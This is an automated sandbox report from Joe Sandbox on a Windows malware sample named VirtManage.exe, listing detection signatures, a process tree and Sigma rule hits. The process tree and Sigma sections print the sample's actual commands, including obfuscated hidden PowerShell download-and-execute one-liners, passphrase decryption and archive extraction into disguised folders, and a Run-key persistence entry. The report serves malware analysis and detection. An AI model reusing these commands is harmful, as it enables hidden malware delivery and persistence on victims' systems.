Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
VirtManage.exe

Overview

General Information

Sample name:VirtManage.exe
Analysis ID:1632487
MD5:b587a6af7fd86eeb42425913b8d73d47
SHA1:ad388fa1cc0bec1fc45b30a460c53c56789bb11d
SHA256:c600dd34854aa5c6c97ed8c1c92d28034d661652b4d892d223b6805a4e864622
Tags:exeFORTUNEPRINTCENTRELIMITEDuser-SquiblydooBlog
Infos:

Detection

Score:42
Range:0 - 100
Confidence:100%

Compliance

Score:34
Range:0 - 100

Signatures

Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
.NET source code contains a domain name check
Encrypted powershell cmdline option found
Loading BitLocker PowerShell Module
Obfuscated command line found
Sigma detected: Dot net compiler compiles file from suspicious location
Suspicious powershell command line found
Uses whoami command line tool to query computer and username
Adds / modifies Windows certificates
Checks for available system drives (often done to infect USB drives)
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses 32bit PE files
Uses 7zip to decompress a password protected archive
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • VirtManage.exe (PID: 6792 cmdline: "C:\Users\user\Desktop\VirtManage.exe" MD5: B587A6AF7FD86EEB42425913B8D73D47)
    • gpg.exe (PID: 3528 cmdline: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\WindowsUpdate24\tools.7z --decrypt C:\ProgramData\Microsoft\WindowsUpdate24\5FILE.1A.gpg MD5: 2F5BFF434DC70BF6C2C24219F7EEA756)
      • conhost.exe (PID: 1480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • gpg.exe (PID: 7036 cmdline: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\WindowsUpdate24\7za.dll --decrypt C:\ProgramData\Microsoft\WindowsUpdate24\1FILE.1A.gpg MD5: 2F5BFF434DC70BF6C2C24219F7EEA756)
      • conhost.exe (PID: 5400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • gpg.exe (PID: 4148 cmdline: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\WindowsUpdate24\7za.exe --decrypt C:\ProgramData\Microsoft\WindowsUpdate24\2FILE.1A.gpg MD5: 2F5BFF434DC70BF6C2C24219F7EEA756)
      • conhost.exe (PID: 1264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • 7za.exe (PID: 4256 cmdline: C:\ProgramData\Microsoft\WindowsUpdate24\7za x C:\ProgramData\Microsoft\WindowsUpdate24\tools.7z -pJerx#sdqWE45 -oC:\ProgramData\Microsoft\WindowsUpdate24 MD5: C58A4193BAC738B1A88ACAD9C6A57356)
      • conhost.exe (PID: 4380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 3376 cmdline: msiexec.exe /i "C:\ProgramData\Microsoft\WindowsUpdate24\RVTools.msi" MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • gpg.exe (PID: 5800 cmdline: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\WindowsUpdate24\Cert.txt --decrypt C:\ProgramData\Microsoft\WindowsUpdate24\3FILE.1A.gpg MD5: 2F5BFF434DC70BF6C2C24219F7EEA756)
      • conhost.exe (PID: 6292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • w32tm.exe (PID: 6884 cmdline: w32tm /monitor /computers:ec2-52-14-160-176.us-east-2.compute.amazonaws.com MD5: E55B6A057FDDD35A7380FB2C6811A8EC)
      • conhost.exe (PID: 2648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • w32tm.exe (PID: 1264 cmdline: w32tm /monitor /computers:ec2-52-14-160-176.us-east-2.compute.amazonaws.com MD5: 81A82132737224D324A3E8DA993E2FB5)
    • gpg.exe (PID: 2904 cmdline: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exe --passphrase "12345678" --batch --yes --output C:\ProgramData\Microsoft\WindowsUpdate24\UpdateFull.7z --decrypt C:\ProgramData\Microsoft\WindowsUpdate24\4FILE.1A.gpg MD5: 2F5BFF434DC70BF6C2C24219F7EEA756)
      • conhost.exe (PID: 3012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • 7za.exe (PID: 5412 cmdline: C:\ProgramData\Microsoft\WindowsUpdate24\7za x C:\ProgramData\Microsoft\WindowsUpdate24\UpdateFull.7z -pTG98HJerxsdqWE45 -oC:\ProgramData\Microsoft\WindowsUpdate24 MD5: C58A4193BAC738B1A88ACAD9C6A57356)
      • conhost.exe (PID: 5508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 1960 cmdline: sc config msdtc start= demand MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
      • conhost.exe (PID: 1896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7132 cmdline: sc config msdtc obj= "LocalSystem" MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
      • conhost.exe (PID: 5792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • oleview.exe (PID: 5724 cmdline: C:\ProgramData\Microsoft\WindowsUpdate24\oleview.exe MD5: ADB9B72679B88DDE1749E0A438222156)
      • powershell.exe (PID: 5872 cmdline: powershell.exe -windowstyle Hidden -command "SI Variable:/E $('C:\Progra'+'mData\Mic'+'rosoft\Wind'+'owsUpdate24\kau'+'tix2ae'+'X.t');popd;Set-Variable X (.(Item Variable:*xec*t).Value.InvokeCommand.(((Item Variable:*xec*t).Value.InvokeCommand|Get-Member|Where-Object{(LS Variable:\_).Value.Name-like'*mma*d'}).Name).Invoke((Item Variable:*xec*t).Value.InvokeCommand.(((Item Variable:*xec*t).Value.InvokeCommand|Get-Member|Where-Object{(LS Variable:\_).Value.Name-like'*dName'}).Name).Invoke('*w-*ct',1,1),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);(Get-ChildItem Variable:\X).Value.((((Get-ChildItem Variable:\X).Value|Get-Member)|Where-Object{(LS Variable:\_).Value.Name-like'*nl*g'}).Name).Invoke((GCI Variable:\E).Value)|.( ([String]''.Normalize)[77,35,46]-Join'')" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • csc.exe (PID: 5812 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b0okydtw\b0okydtw.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
          • cvtres.exe (PID: 5652 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA360.tmp" "c:\Users\user\AppData\Local\Temp\b0okydtw\CSCB61681A6E66748218243D78918A832B.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
        • whoami.exe (PID: 7368 cmdline: "C:\Windows\system32\whoami.exe" MD5: A4A6924F3EAF97981323703D38FD99C4)
  • msiexec.exe (PID: 5700 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 6964 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding FB5755C4D12C2C80E27834E9FC6EF971 C MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • WmiPrvSE.exe (PID: 1324 cmdline: C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding MD5: 64ACA4F48771A5BA50CD50F2410632AD)
  • oleview.exe (PID: 6672 cmdline: "C:\ProgramData\Microsoft\LogUpdateWindows\oleview.exe" MD5: ADB9B72679B88DDE1749E0A438222156)
    • powershell.exe (PID: 6556 cmdline: powershell.exe -windowstyle Hidden -command "SI Variable:/gO $('C:\Pro'+'gramData\Mic'+'roso'+'ft\LogUp'+'dateWi'+'ndows\Wiaph'+'oh7um.t');Set-Item Variable:/fH 'Net.WebClient';dir ect*;SV BO (.$ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where{(Get-ChildItem Variable:\_).Value.Name-like'*dl*ts'}).Name).Invoke('Ne*ct')(Variable fH -Value));SI Variable:2Rn ((((Get-ChildItem Variable:/BO).Value|GM)|Where{(Get-ChildItem Variable:\_).Value.Name-like'*nl*g'}).Name);Invoke-Command(($ExecutionContext|ForEach{(Get-ChildItem Variable:\_).Value.(($ExecutionContext|GM)[6].Name)|ForEach{(GCI Variable:\_).Value.NewScriptBlock((Get-ChildItem Variable:/BO).Value.((Item Variable:/2Rn).Value).Invoke((GI Variable:/gO).Value))}}))" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 5808 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

Sigma detected: CurrentVersion Autorun Keys Modification
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\Microsoft\LogUpdateWindows\oleview.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\VirtManage.exe, ProcessId: 6792, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UpdateOleview
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b0okydtw\b0okydtw.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b0okydtw\b0okydtw.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -windowstyle Hidden -command "SI Variable:/E $('C:\Progra'+'mData\Mic'+'rosoft\Wind'+'owsUpdate24\kau'+'tix2ae'+'X.t');popd;Set-Variable X (.(Item Variable:*xec*t).Value.InvokeCommand.(((Item Variable:*xec*t).Value.InvokeCommand|Get-Member|Where-Object{(LS Variable:\_).Value.Name-like'*mma*d'}).Name).Invoke((Item Variable:*xec*t).Value.InvokeCommand.(((Item Variable:*xec*t).Value.InvokeCommand|Get-Member|Where-Object{(LS Variable:\_).Value.Name-like'*dName'}).Name).Invoke('*w-*ct',1,1),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);(Get-ChildItem Variable:\X).Value.((((Get-ChildItem Variable:\X).Value|Get-Member)|Where-Object{(LS Variable:\_).Value.Name-like'*nl*g'}).Name).Invoke((GCI Variable:\E).Value)|.( ([String]''.Normalize)[77,35,46]-Join'')", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5872, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b0okydtw\b0okydtw.cmdline", ProcessId: 5812, ProcessName: csc.exe
Sigma detected: Usage Of Web Request Commands And Cmdlets
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell.exe -windowstyle Hidden -command "SI Variable:/E $('C:\Progra'+'mData\Mic'+'rosoft\Wind'+'owsUpdate24\kau'+'tix2ae'+'X.t');popd;Set-Variable X (.(Item Variable:*xec*t).Value.InvokeCommand.(((Item Variable:*xec*t).Value.InvokeCommand|Get-Member|Where-Object{(LS Variable:\_).Value.Name-like'*mma*d'}).Name).Invoke((Item Variable:*xec*t).Value.InvokeCommand.(((Item Variable:*xec*t).Value.InvokeCommand|Get-Member|Where-Object{(LS Variable:\_).Value.Name-like'*dName'}).Name).Invoke('*w-*ct',1,1),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);(Get-ChildItem Variable:\X).Value.((((Get-ChildItem Variable:\X).Value|Get-Member)|Where-Object{(LS Variable:\_).Value.Name-like'*nl*g'}).Name).Invoke((GCI Variable:\E).Value)|.( ([String]''.Normalize)[77,35,46]-Join'')", CommandLine: powershell.exe -windowstyle Hidden -command "SI Variable:/E $('C:\Progra'+'mData\Mic'+'rosoft\Wind'+'owsUpdate24\kau'+'tix2ae'+'X.t');popd;Set-Variable X (.(Item Variable:*xec*t).Value.InvokeCommand.(((Item Variable:*xec*t).Value.InvokeCommand|Get-Member|Where-Object{(LS Variable:\_).Value.Name-like'*mma*d'}).Name).Invoke((Item Variable:*xec*t).Value.InvokeCommand.(((Item Variable:*xec*t).Value.InvokeCommand|Get-Member|Where-Object{(LS Variable:\_).Value.Name-like'*dName'}).Name).Invoke('*w-*ct',1,1),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);(Get-ChildItem Variable:\X).Value.((((Get-ChildItem Variable:\X).Value|Get-Member)|Where-Object{(LS Variable:\_).Value.Name-like'*nl*g'}).Name).Invoke((GCI Variable:\E).Value)|.( ([String]''.Normalize)[77,35,46]-Join'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\ProgramData\Microsoft\WindowsUpdate24\oleview.exe, ParentImage: C:\ProgramData\Microsoft\WindowsUpdate24\oleview.exe, ParentProcessId: 5724, ParentProcessName: oleview.exe, ProcessCommandLine: powershell.exe -windowstyle Hidden -command "SI Variable:/E $('C:\Progra'+'mData\Mic'+'rosoft\Wind'+'owsUpdate24\kau'+'tix2ae'+'X.t');popd;Set-Variable X (.(Item Variable:*xec*t).Value.InvokeCommand.(((Item Variable:*xec*t).Value.InvokeCommand|Get-Member|Where-Object{(LS Variable:\_).Value.Name-like'*mma*d'}).Name).Invoke((Item Variable:*xec*t).Value.InvokeCommand.(((Item Variable:*xec*t).Value.InvokeCommand|Get-Member|Where-Object{(LS Variable:\_).Value.Name-like'*dName'}).Name).Invoke('*w-*ct',1,1),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);(Get-ChildItem Variable:\X).Value.((((Get-ChildItem Variable:\X).Value|Get-Member)|Where-Object{(LS Variable:\_).Value.Name-like'*nl*g'}).Name).Invoke((GCI Variable:\E).Value)|.( ([String]''.Normalize)[77,35,46]-Join'')", ProcessId: 5872, ProcessName: powershell.exe
Sigma detected: Dynamic CSharp Compile Artefact
Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5872, TargetFilename: C:\Users\user\AppData\Local\Temp\b0okydtw\b0okydtw.cmdline
Sigma detected: Local Accounts Discovery
Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: "C:\Windows\system32\whoami.exe", CommandLine: "C:\Windows\system32\whoami.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\whoami.exe, NewProcessName: C:\Windows\System32\whoami.exe, OriginalFileName: C:\Windows\System32\whoami.exe, ParentCommandLine: powershell.exe -windowstyle Hidden -command "SI Variable:/E $('C:\Progra'+'mData\Mic'+'rosoft\Wind'+'owsUpdate24\kau'+'tix2ae'+'X.t');popd;Set-Variable X (.(Item Variable:*xec*t).Value.InvokeCommand.(((Item Variable:*xec*t).Value.InvokeCommand|Get-Member|Where-Object{(LS Variable:\_).Value.Name-like'*mma*d'}).Name).Invoke((Item Variable:*xec*t).Value.InvokeCommand.(((Item Variable:*xec*t).Value.InvokeCommand|Get-Member|Where-Object{(LS Variable:\_).Value.Name-like'*dName'}).Name).Invoke('*w-*ct',1,1),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);(Get-ChildItem Variable:\X).Value.((((Get-ChildItem Variable:\X).Value|Get-Member)|Where-Object{(LS Variable:\_).Value.Name-like'*nl*g'}).Name).Invoke((GCI Variable:\E).Value)|.( ([String]''.Normalize)[77,35,46]-Join'')", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5872, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\whoami.exe", ProcessId: 7368, ProcessName: whoami.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle Hidden -command "SI Variable:/E $('C:\Progra'+'mData\Mic'+'rosoft\Wind'+'owsUpdate24\kau'+'tix2ae'+'X.t');popd;Set-Variable X (.(Item Variable:*xec*t).Value.InvokeCommand.(((Item Variable:*xec*t).Value.InvokeCommand|Get-Member|Where-Object{(LS Variable:\_).Value.Name-like'*mma*d'}).Name).Invoke((Item Variable:*xec*t).Value.InvokeCommand.(((Item Variable:*xec*t).Value.InvokeCommand|Get-Member|Where-Object{(LS Variable:\_).Value.Name-like'*dName'}).Name).Invoke('*w-*ct',1,1),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);(Get-ChildItem Variable:\X).Value.((((Get-ChildItem Variable:\X).Value|Get-Member)|Where-Object{(LS Variable:\_).Value.Name-like'*nl*g'}).Name).Invoke((GCI Variable:\E).Value)|.( ([String]''.Normalize)[77,35,46]-Join'')", CommandLine: powershell.exe -windowstyle Hidden -command "SI Variable:/E $('C:\Progra'+'mData\Mic'+'rosoft\Wind'+'owsUpdate24\kau'+'tix2ae'+'X.t');popd;Set-Variable X (.(Item Variable:*xec*t).Value.InvokeCommand.(((Item Variable:*xec*t).Value.InvokeCommand|Get-Member|Where-Object{(LS Variable:\_).Value.Name-like'*mma*d'}).Name).Invoke((Item Variable:*xec*t).Value.InvokeCommand.(((Item Variable:*xec*t).Value.InvokeCommand|Get-Member|Where-Object{(LS Variable:\_).Value.Name-like'*dName'}).Name).Invoke('*w-*ct',1,1),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);(Get-ChildItem Variable:\X).Value.((((Get-ChildItem Variable:\X).Value|Get-Member)|Where-Object{(LS Variable:\_).Value.Name-like'*nl*g'}).Name).Invoke((GCI Variable:\E).Value)|.( ([String]''.Normalize)[77,35,46]-Join'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\ProgramData\Microsoft\WindowsUpdate24\oleview.exe, ParentImage: C:\ProgramData\Microsoft\WindowsUpdate24\oleview.exe, ParentProcessId: 5724, ParentProcessName: oleview.exe, ProcessCommandLine: powershell.exe -windowstyle Hidden -command "SI Variable:/E $('C:\Progra'+'mData\Mic'+'rosoft\Wind'+'owsUpdate24\kau'+'tix2ae'+'X.t');popd;Set-Variable X (.(Item Variable:*xec*t).Value.InvokeCommand.(((Item Variable:*xec*t).Value.InvokeCommand|Get-Member|Where-Object{(LS Variable:\_).Value.Name-like'*mma*d'}).Name).Invoke((Item Variable:*xec*t).Value.InvokeCommand.(((Item Variable:*xec*t).Value.InvokeCommand|Get-Member|Where-Object{(LS Variable:\_).Value.Name-like'*dName'}).Name).Invoke('*w-*ct',1,1),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);(Get-ChildItem Variable:\X).Value.((((Get-ChildItem Variable:\X).Value|Get-Member)|Where-Object{(LS Variable:\_).Value.Name-like'*nl*g'}).Name).Invoke((GCI Variable:\E).Value)|.( ([String]''.Normalize)[77,35,46]-Join'')", ProcessId: 5872, ProcessName: powershell.exe
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 616, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 5808, ProcessName: svchost.exe

Data Obfuscation

barindex
Sigma detected: Dot net compiler compiles file from suspicious location
Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b0okydtw\b0okydtw.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b0okydtw\b0okydtw.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -windowstyle Hidden -command "SI Variable:/E $('C:\Progra'+'mData\Mic'+'rosoft\Wind'+'owsUpdate24\kau'+'tix2ae'+'X.t');popd;Set-Variable X (.(Item Variable:*xec*t).Value.InvokeCommand.(((Item Variable:*xec*t).Value.InvokeCommand|Get-Member|Where-Object{(LS Variable:\_).Value.Name-like'*mma*d'}).Name).Invoke((Item Variable:*xec*t).Value.InvokeCommand.(((Item Variable:*xec*t).Value.InvokeCommand|Get-Member|Where-Object{(LS Variable:\_).Value.Name-like'*dName'}).Name).Invoke('*w-*ct',1,1),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);(Get-ChildItem Variable:\X).Value.((((Get-ChildItem Variable:\X).Value|Get-Member)|Where-Object{(LS Variable:\_).Value.Name-like'*nl*g'}).Name).Invoke((GCI Variable:\E).Value)|.( ([String]''.Normalize)[77,35,46]-Join'')", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5872, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b0okydtw\b0okydtw.cmdline", ProcessId: 5812, ProcessName: csc.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for dropped file
Source: C:\ProgramData\Microsoft\LogUpdateWindows\aclui.dllAvira: detection malicious, Label: TR/Redcap.dbiqq
Source: C:\ProgramData\Microsoft\WindowsUpdate24\aclui-2.dllAvira: detection malicious, Label: TR/Redcap.dbiqq
Multi AV Scanner detection for dropped file
Source: C:\ProgramData\Microsoft\LogUpdateWindows\aclui.dllReversingLabs: Detection: 66%
Source: C:\ProgramData\Microsoft\WindowsUpdate24\aclui-2.dllReversingLabs: Detection: 66%
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 1_2_0044C0D0 gcry_sexp_build,gcry_sexp_build,gcry_sexp_build,gcry_pk_verify,gcry_sexp_release,gcry_sexp_release,gcry_sexp_release,gcry_sexp_build,gcry_free,gcry_sexp_build,gcry_mpi_get_nbits,gcry_mpi_release,gcry_mpi_release,gcry_sexp_build,gcry_sexp_build,gcry_sexp_build,gcry_sexp_build,gcry_sexp_build,gcry_free,gcry_mpi_get_nbits,gcry_mpi_copy,gcry_mpi_copy,gcry_mpi_get_flag,gcry_mpi_get_flag,gcry_sexp_build,gpg_err_code_from_syserror,gpg_err_code_from_syserror,gcry_sexp_build,gcry_mpi_get_flag,gcry_mpi_get_flag,gcry_mpi_get_opaque,memcpy,gcry_mpi_set_opaque_copy,gpg_err_code_from_syserror,gcry_mpi_print,memmove,gcry_mpi_set_opaque_copy,_gpgrt_log_assert,gcry_mpi_get_flag,gcry_mpi_get_opaque,memcpy,gcry_mpi_set_opaque_copy,gcry_mpi_get_opaque,memcpy,gcry_mpi_set_opaque_copy,gcry_mpi_print,memmove,gcry_mpi_set_opaque_copy,_gpgrt_log_assert,gcry_sexp_release,gcry_sexp_release,gcry_sexp_release,gcry_sexp_build,gcry_sexp_release,gcry_sexp_release,gcry_sexp_build,gcry_sexp_build,gcry_pk_encrypt,gcry_sexp_release,gcry_sexp_release,gcry_sexp_find_token,gcry_sexp_nth_mpi,gcry_sexp_release,gcry_sexp_find_token,gcry_sexp_nth_mpi,gcry_sexp_release,gcry_sexp_find_token,gcry_sexp_nth_data,gcry_malloc,memcpy,gcry_sexp_release,gcry_sexp_release,gcry_free,gcry_mpi_release,gcry_mpi_release,gcry_sexp_build,gcry_free,gcry_mpi_release,gcry_mpi_get_opaque,gcry_free,gpgrt_log_debug,gcry_mpi_dump,gpgrt_log_printf,gpg_err_code_from_syserror,gcry_mpi_release,gcry_sexp_build,_gpgrt_log_assert,_gpgrt_log_assert,_gpgrt_log_assert,gcry_sexp_build,gcry_pk_testkey,gcry_sexp_release,gcry_sexp_build,gcry_sexp_build,gcry_sexp_build,gcry_free,gpg_err_code_from_syserror,1_2_0044C0D0
Source: C:\ProgramData\Microsoft\WindowsUpdate24\gpg.exeCode function: 1_2_00464220 gcry_cipher_open,gcry_sexp_release,gcry_free,gcry_free,gcry_free,gcry_cipher_close,gcry_free,gcry_cipher_setkey,gcry_free,gcry_sexp_release,gcry_sexp_build,gcry_free,gcry_free,gpg_strerror,gpgrt_log_error,gpg_err_code_from_syserror,gcry_sexp_build_array,gcry_free,gpgrt_snprintf,gcry_sexp_build,gcry_free,gcry_sexp_release,gcry_sexp_release,gcry_sexp_release,gpg_strerror,gpgrt_log_error,gcry_sexp_build,gcry_sexp_build,gcry_sexp_release,gcry_sexp_release,gcry_sexp_release,gcry_free,gcry_malloc,gcry_cipher_encrypt,gcry_free,gcry_free,gcry_mpi_get_flag,gpg_strerror,_gpg_w32_gettext,gpgrt_log_error,gcry_mpi_get_flag,gcry_mpi_get_flag,gcry_mpi_get_flag,gcry_mpi_get_opaque,gpgrt_log_info,gpg_strerror,gpgrt_log_error,_gpg_w32_gettext,gpgrt_log_info,gpg_err_code_from_syserror,gcry_free,gcry_free,_gpg_w32_gettext,gpgrt_log_info,gpg_strerror,gpgrt_log_error,gpgrt_log,abort,gpg_err_code_from_syserror,1_2_00464220
